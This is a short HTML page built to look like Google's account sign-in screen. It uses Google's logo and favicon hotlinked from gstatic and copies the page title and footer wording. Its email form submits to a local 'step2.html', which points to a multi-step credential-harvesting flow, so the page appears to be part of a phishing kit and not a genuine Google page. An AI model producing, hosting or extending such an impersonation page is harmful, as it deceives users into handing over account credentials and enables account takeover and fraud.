
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Sign in – Google accounts</title>
  <link rel="stylesheet" href="style.css" />
  <link rel="icon" href="https://ssl.gstatic.com/accounts/ui/favicon_2x.png" type="image/png">
</head>
<body>
  <div class="container">
    <img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google" class="logo" />
    <form action="step2.html" method="get">
      <label for="email">Email or phone</label>
      <input type="email" id="email" name="email" required />
      <button type="submit">Next</button>
    </form>
    <p class="footer">Not your computer? Use Guest mode to sign in privately.</p>
  </div>
</body>
</html>
